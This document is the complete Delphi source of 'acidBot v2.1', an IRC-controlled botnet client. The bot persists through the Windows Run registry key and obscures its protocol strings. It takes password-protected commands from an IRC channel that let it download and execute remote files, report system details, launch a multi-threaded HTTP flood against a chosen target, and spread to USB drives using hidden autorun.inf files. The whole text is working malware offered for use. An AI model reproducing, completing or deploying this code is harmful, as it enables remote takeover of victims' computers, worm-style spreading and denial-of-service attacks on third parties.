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- program acidBot2;
- // acidBot v2.1 by Acid/HuckJam
- // This bot was made to show that Delphi
- // is perfectly fine for bots too.
- // Credits to Aphex for his TThread & ApplicationUnit.
- uses
- Windows,
- WinSock,
- ShellAPI,
- abEncryption,
- abFunctions,
- abWinsock,
- abThreads,
- abApplication,
- abHTTPFlood;
- var
- IRCDInfo: array[1..4] of String = ('', '32828', '#kewl', '');
- FileInfo: array[1..4] of String = ('regdrv.exe', 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', 'Registry Driver', 'aB2-Mutex');
- AuthInfo: array[1..3] of String = ('*!*@*', 'mypassword', '!');
- BotComnd: array[1..11] of String = ('login', 'logout', 'uninstall', 'die', 'version', 'sysinfo', 'opensite', 'download', 'spread', 'httpflood', 'httpfloodstop');
- IRCProto: array[1..7] of String = ('����', '����', '����', '����', '����', '���', '�������');
- var
- Application: TApplication;
- ircSocket: TClientSocket;
- GetPath, AuthName, BotName, Master, Target: String;
- Port: Integer;
- Mutex: Cardinal;
- LoggedIn, PrivateMsg, Spread, Flooding: Boolean;
- procedure DecryptStrings();
- var
- I: Integer;
- begin
- for I := 1 to 7 do IRCProto[I] := Decrypt(IRCProto[I]);
- end;
- procedure SendMessage(Msg: String);
- begin
- if PrivateMsg then ircSocket.SendString(IRCProto[7] + ' ' + Master + ' :' + Msg + #10#13) else
- ircSocket.SendString(IRCProto[7] + ' ' + IRCDInfo[3] + ' :' + Msg + #10#13);
- end;
- procedure HTTPFloodThread();
- var
- httpSocket: TClientSocket;
- Site: String;
- begin
- httpSocket := TClientSocket.Create;
- while Flooding do
- begin
- httpSocket.Connect(Target, Port);
- if httpSocket.Connected then
- begin
- Site := 'http://' + Target;
- httpSocket.SendString(CreateHTTPRequest(Site));
- httpSocket.Disconnect;
- Sleep(1);
- Application.ProcessMessages;
- end;
- end;
- httpSocket.Free;
- end;
- procedure SpreadUSB();
- var
- Drive: Char;
- Path: String;
- AutoStart: TextFile;
- begin
- while Spread do
- begin
- for Drive := 'B' to 'Z' do
- begin
- if GetDriveType(PChar(Drive + ':\')) = DRIVE_REMOVABLE then
- begin
- Path := Drive + ':\' + FileInfo[1];
- if FileExists(Path) = False then
- begin
- CopyFile(PChar(ParamStr(0)), PChar(Path), False);
- SetFileAttributes(PChar(Path), FILE_ATTRIBUTE_HIDDEN);
- AssignFile(AutoStart, Drive + ':\' + 'autorun.inf');
- ReWrite(AutoStart);
- WriteLn(AutoStart, '[autorun]');
- WriteLn(AutoStart, 'open=' + FileInfo[1]);
- CloseFile(AutoStart);
- SetFileAttributes(PChar(Drive + ':\' + 'autorun.inf'), FILE_ATTRIBUTE_HIDDEN);
- SendMessage('[Spread] Device found, file dropped.');
- end;
- end;
- end;
- Sleep(30000);
- end;
- end;
- procedure Install(Uninstall: Integer);
- begin
- if Uninstall = 0 then
- begin
- if MatchStrings(ParamStr(0), GetPath) = False then
- begin
- CopyFile(PChar(ParamStr(0)), PChar(GetPath), False);
- ExecuteFile(GetPath);
- ExitProcess(0);
- end else InsertRegValue(HKEY_CURRENT_USER, FileInfo[2], FileInfo[3], GetPath);
- end else
- if Uninstall = 1 then
- begin
- DeleteRegValue(HKEY_CURRENT_USER, FileInfo[2], FileInfo[3]);
- DeleteSelf(ParamStr(0));
- ExitProcess(0);
- end;
- end;
- procedure ParseIRC(RawData: String);
- var
- Trimmed: String;
- Param: array[1..4] of String;
- RawDataBack: String;
- I: Integer;
- begin
- if (CheckAuthHost(AuthInfo[1], RawData)) and (Pos(IRCProto[7], RawData) > 0) then
- begin
- RawDataBack := RawData;
- Delete(RawDataBack, 1, 1);
- Master := Copy(RawDataBack, 1, Pos('!', RawDataBack) - 1);
- if Pos(BotName, RawDataBack) > 7 then PrivateMsg := True else PrivateMsg := False;
- if PrivateMsg then Delete(RawDataBack, 1, Pos(BotName + ' :', RawDataBack) + Length(BotName) + 1) else
- Delete(RawDataBack, 1, Pos(IRCDInfo[3] + ' :', RawDataBack) + Length(IRCDInfo[3]) + 1);
- Trimmed := TrimEx(RawDataBack);
- if LeftStr(Trimmed, 1) = AuthInfo[3] then
- begin
- Delete(Trimmed, 1, 1);
- //This is a cheap method so we don't need to make a TStringList replacement.
- //There might be a better way but this is what I chose.
- Param[1] := Split(Trimmed, ' ', 1);
- Param[2] := Split(Trimmed, ' ', 2);
- Param[3] := Split(Trimmed, ' ', 3);
- Param[4] := Split(Trimmed, ' ', 4);
- if Param[1] = BotComnd[1] then
- begin
- if Param[2] = AuthInfo[2] then
- begin
- if LeftStr(RawData, 25) <> AuthName then
- begin
- LoggedIn := True;
- AuthName := LeftStr(RawData, 25);
- SendMessage('Welcome Master!');
- end;
- end;
- end;
- if LoggedIn = True then
- begin
- if Param[1] = BotComnd[2] then
- begin
- LoggedIn := False;
- AuthName := '';
- SendMessage('I will wait for you master!');
- end;
- end;
- if (LoggedIn = True) and (AuthName = LeftStr(RawData, 25)) then
- begin
- if Trimmed = BotComnd[3] then Install(1);
- if Trimmed = BotComnd[4] then ExitProcess(0);
- if Trimmed = BotComnd[5] then SendMessage('acidBot v2.1');
- if Trimmed = BotComnd[6] then SendMessage('OS: ' + GetWinVersion + ', Processor: ' + GetProcessorName + ', RAM: ' + GetTotalRAM + ', GFX Card: ' + GetVideoCard + ', System Uptime: ' + GetUptime);
- if Param[1] = BotComnd[7] then
- begin
- ShellExecute(0, 'open', PChar(Param[2]), '', '', SW_SHOW);
- SendMessage('The website have been opened.');
- end;
- if Param[1] = BotComnd[8] then
- begin
- SendMessage('Attempting to download ' + Param[2]);
- if Download(Param[2], Param[3]) then
- begin
- if Param[4] <> '1' then SendMessage('Download Complete!');
- if Param[4] = '1' then
- begin
- ExecuteFile(Param[3]);
- SendMessage('File Downloaded & Executed!');
- end;
- end else SendMessage('Download Failed!');
- end;
- if Param[1] = BotComnd[9] then
- begin
- if Param[2] = 'on' then
- begin
- Spread := True;
- TThread.Create(@SpreadUSB, 0);
- SendMessage('[Spread] Spreading ON.');
- end else
- if Param[2] = 'off' then
- begin
- Spread := False;
- SendMessage('[Spread] Spreading OFF.');
- end;
- end;
- if Param[1] = BotComnd[10] then
- begin
- Flooding := True;
- if Pos('http://', Param[2]) > 0 then Delete(Param[2], 1, 7);
- if RightStr(Param[2], 1) = '/' then Delete(Param[2], Length(Param[2]), 1);
- Target := Param[2];
- Port := StrToInt(Param[3]);
- for I := 0 to 20 do TThread.Create(@HTTPFloodThread, 0);
- SendMessage('[HTTPFlood] Started on ' + Target);
- end;
- if Param[1] = BotComnd[11] then
- begin
- Flooding := False;
- SendMessage('[HTTPFlood] Stopped.');
- end;
- end;
- end;
- end;
- end;
- procedure RecieveData(Thread: TThread; Socket: TClientSocket);
- var
- Data, Temp: String;
- NonBlocking: Integer;
- begin
- NonBlocking := 1;
- IoCtlSocket(Socket.Socket, FIONBIO, NonBlocking);
- while Socket.Connected do
- begin
- Data := Socket.ReceiveString;
- if Length(Data) > 0 then
- begin
- while(Pos(#10, Data) <> 0) do
- begin
- Temp := Copy(Data, 1, Pos(#10, Data) - 1);
- Delete(Data, 1, Pos(#10, Data));
- ParseIRC(Temp);
- if Pos(IRCProto[6], Temp) > 0 then ircSocket.SendString(IRCProto[3] + ' ' + IRCDInfo[3] + ' ' + IRCDInfo[4] + #10#13);
- if (Pos(IRCProto[2], LowerCase(Temp)) > 0) and (Pos(IRCProto[7], Temp) = 0)then ircSocket.SendString(IRCProto[3] + ' ' + IRCDInfo[3] + ' ' + IRCDInfo[4] + #10#13);
- if (Pos(IRCProto[1], LowerCase(Temp)) > 0) and (Pos(IRCProto[7], Temp) = 0) then ircSocket.SendString(ReplaceString(Temp, IRCProto[1], 'pong') + #10#13);
- end;
- if Temp <> '' then Temp := '';
- Data := '';
- end;
- Sleep(1);
- Application.ProcessMessages;
- end;
- Socket.Disconnect;
- Socket.Free;
- end;
- procedure CreateConnection(Thread: TThread);
- begin
- while 0 < 1 do
- begin
- ircSocket := TClientSocket.Create;
- ircSocket.Connect(IRCDInfo[1], StrToInt(IRCDInfo[2]));
- if ircSocket.Connected then
- begin
- Randomize;
- BotName := '[' + GetWinLang + '|' + IntToStr(100000000 + Random(899999999)) + ']';
- ircSocket.SendString(IRCProto[4] + ' acidBot acidBot acidBot acidBot ' + #10#13);
- ircSocket.SendString(IRCProto[5] + ' ' + BotName + #10#13);
- RecieveData(Thread, ircSocket);
- end;
- Sleep(5000);
- end;
- end;
- begin
- GetPath := GetAppDataPath + FileInfo[1];
- DecryptStrings();
- Install(0);
- Mutex := CreateMutex(nil, True, PChar(FileInfo[4]));
- if (Mutex = 0) or (GetLastError = ERROR_ALREADY_EXISTS) then ExitProcess(0);
- DeleteFile('~SystemCache.bat');
- if MatchStrings(ParamStr(0), GetPath) then
- TThread.Create(@CreateConnection, 0);
- Application := TApplication.Create;
- while 0 < 1 do
- begin
- Sleep(1);
- Application.ProcessMessages;
- end;
- end.
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